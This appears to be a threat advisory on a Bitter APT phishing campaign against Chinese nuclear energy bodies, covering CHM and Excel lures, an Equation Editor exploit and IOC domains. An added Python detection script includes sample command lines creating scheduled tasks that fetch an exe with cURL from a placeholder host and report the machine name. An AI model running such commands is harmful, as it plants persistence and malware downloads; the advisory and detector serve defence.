

Severity
High
Analysis Summary
The Chinese nuclear energy industry has recently been targeted by a cyberespionage group known as Bitter APT, which used phishing emails to infect computers with malware downloaders. Bitter APT has been active since at least 2021. In the past, the group has targeted organizations in Pakistan, China, Bangladesh, and Saudi Arabia, focusing on the energy and government sectors.
In recent attacks, researchers have observed additional layers of obfuscation and modifications to the first-stage payloads intended to evade detection, as well as further decoy documents used for social engineering.
In a recent campaign discovered by researchers, Bitter sent emails to numerous Chinese nuclear energy enterprises and academics working in that field while posing as the embassy of Kyrgyzstan in Beijing.
[Figure: phishing email]
“We identified seven emails pretending to be from the Embassy of Kyrgyzstan, being sent to recipients in the nuclear energy industry in China. In some emails, people and entities in academia are also targeted, also related to nuclear energy. The phishing emails contain a lure that invites the recipients to join conferences on subjects that are relevant to them. The lures are designed to socially engineer the recipient to download and open an attached RAR file that contains either a Microsoft Compiled HTML Help (CHM) or Excel payload,” the report states.
The email contains a RAR attachment, which is falsely claimed to contain an invitation card for a conference, but actually contains either a Microsoft Compiled HTML Help (CHM) file or a malicious Excel document.
The Bitter APT uses a CHM payload that executes commands to create scheduled tasks on the compromised system and download the next stage of the attack. This is a common tactic used by attackers to maintain persistence on a system and evade detection by security software.
When the RAR attachment instead contains an Excel document, the scheduled task is created by exploiting an older Equation Editor vulnerability that is triggered when the malicious document is opened. Equation Editor is a component of Microsoft Office that allows users to insert mathematical equations into their documents. The vulnerability in Equation Editor was first discovered in 2017 and allows attackers to execute code remotely on a victim’s computer.
According to the researchers, the threat actor probably prefers CHM payloads because they work with the least amount of user interaction, do not require the victim to run a vulnerable version of Microsoft Office, and may evade static analysis thanks to LZX compression.
[Figure: infection chain]
They also added: “The Excel payloads simply contain an Equation Editor exploit that creates two different scheduled tasks. There is no decoy in the document. One scheduled task (shown below) runs every 15 minutes, to download a next stage EXE payload using cURL, also sending the actor the name of the infected machine. These tactics have been observed being used by Bitter APT in 2021/2022.”
The second-stage payload is an MSI or PowerShell file if a CHM payload is used, or an EXE file if an Excel document payload is utilized.
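As an added illustration of how a defender could hunt for the chain described above (example code, not from the Rewterz report), the following Python flags the two behaviours the text names: a CHM viewer (hh.exe) or Equation Editor (EQNEDT32.EXE) process spawning a shell or scheduler, and a scheduled task with a 15-minute interval that downloads a payload with cURL and reports the machine name. The telemetry records, task names and the example.invalid URL are constructed; real deployments would feed Sysmon Event ID 1 or EDR process-creation data into the same functions.

```python
"""Detection logic for the Bitter APT CHM/Excel infection chain (added example)."""
import re

# Launchers of the two lure types. Neither normally spawns a shell or scheduler.
LURE_PARENTS = {"hh.exe", "eqnedt32.exe"}
CHILD_TOOLS = {"cmd.exe", "powershell.exe", "schtasks.exe", "curl.exe", "msiexec.exe"}

# schtasks /create ... /sc minute /mo N  -> task repeats every N minutes
SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.I)
MINUTE_INTERVAL = re.compile(r"/sc\s+minute\s+/mo\s+(\d+)", re.I)
DOWNLOADER = re.compile(r"\b(curl|bitsadmin|certutil|powershell)\b.*https?://", re.I)
HOSTNAME_LEAK = re.compile(r"%computername%|\$env:computername|hostname", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def check_event(ev: dict) -> list[str]:
    """Return the names of the rules this process-creation event matches."""
    hits = []
    parent, child, cmd = basename(ev["ParentImage"]), basename(ev["Image"]), ev["CommandLine"]
    if parent in LURE_PARENTS and child in CHILD_TOOLS:
        hits.append("lure_launcher_spawns_tool")
    if SCHTASKS_CREATE.search(cmd):
        m = MINUTE_INTERVAL.search(cmd)
        if m and int(m.group(1)) <= 15 and DOWNLOADER.search(cmd):
            hits.append("short_interval_download_task")
        if HOSTNAME_LEAK.search(cmd):
            hits.append("task_sends_hostname")
    return hits


def scan(events: list[dict]) -> dict[int, list[str]]:
    """Map event index -> matched rules, for every event that matched at least one."""
    return {i: h for i, ev in enumerate(events) if (h := check_event(ev))}


# Constructed sample telemetry (Sysmon-style fields, placeholder domain).
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\hh.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c schtasks /create /sc minute /mo 15 /tn "Update" '
                    r'/tr "curl -s http://example.invalid/u?h=%COMPUTERNAME% -o %TEMP%\s.exe"'},
    {"ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EQNEDT32.EXE",
     "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks.exe /create /sc minute /mo 15 /tn "Sync" /tr "curl http://example.invalid/p.exe -o p.exe"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\schtasks.exe",
     "CommandLine": r'schtasks /create /sc daily /tn "Backup" /tr "C:\backup\run.cmd"'},  # benign
]

if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, rules, SAMPLE_EVENTS[idx]["CommandLine"])
```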
[Figure: malicious PowerShell (in CHM file)]
Analysts were unable to collect any actual payloads delivered in this campaign, although they suspected that they might have included keyloggers, RATs (remote access tools), and data stealers.
“Bitter APT have been conducting espionage campaigns for years using many tactics, including phishing, to achieve their goals. It is advised that entities in government, energy, and engineering especially those in the Asia-Pacific region should remain vigilant when receiving emails, especially those claiming to be from other diplomatic entities,” the researchers conclude.
Impact
- Information Theft and Espionage
Indicators of Compromise
MD5
SHA-256
SHA-1
Domain Name
- qwavemediaservice.net
- mirzadihatti.com
- coauthcn.com
Remediation
- Search for IOCs in your environment. Block all threat indicators at your respective controls.
- Along with network and system hardening, code hardening should be implemented within the organization so that its websites and software are secure. Use testing tools to detect any vulnerabilities in the deployed code.
- Patch and upgrade any platforms and software in a timely manner and make this a standard security policy. Prioritize patching known exploited vulnerabilities and zero-days.
- Educate Employees: Organizations should provide security awareness training to their employees to ensure they understand the risks associated with phishing attacks and how to identify them. Employees should be cautious when receiving unexpected emails with attachments, especially if they are from an unknown sender.
- Update Software: Ensure that all software, including Microsoft Office, is up to date with the latest security patches to prevent vulnerabilities from being exploited by attackers.
- Implement Email Filtering: Deploy an email filtering system that can detect and block suspicious emails that may contain malware or phishing attempts.
- Limit Administrative Access: Restrict administrative access to critical systems and sensitive data to only those who require it.
- Implement Two-Factor Authentication (2FA): Implement 2FA as an additional layer of security to prevent unauthorized access to user accounts.
- Conduct Regular Backups: Regularly backup critical data and test the backup and recovery process to ensure that the organization can quickly restore operations in the event of a successful attack.
- Deploy Endpoint Detection and Response (EDR): Implement EDR solutions to detect and respond to any suspicious activity or malware on endpoints.
- Develop an Incident Response Plan: Organizations should have an incident response plan in place that outlines the steps to take in the event of a successful attack, including containment, eradication, and recovery.
By following these steps, organizations can improve their overall security posture and mitigate the risk of falling victim to phishing attacks such as the one carried out by the Bitter threat actor group.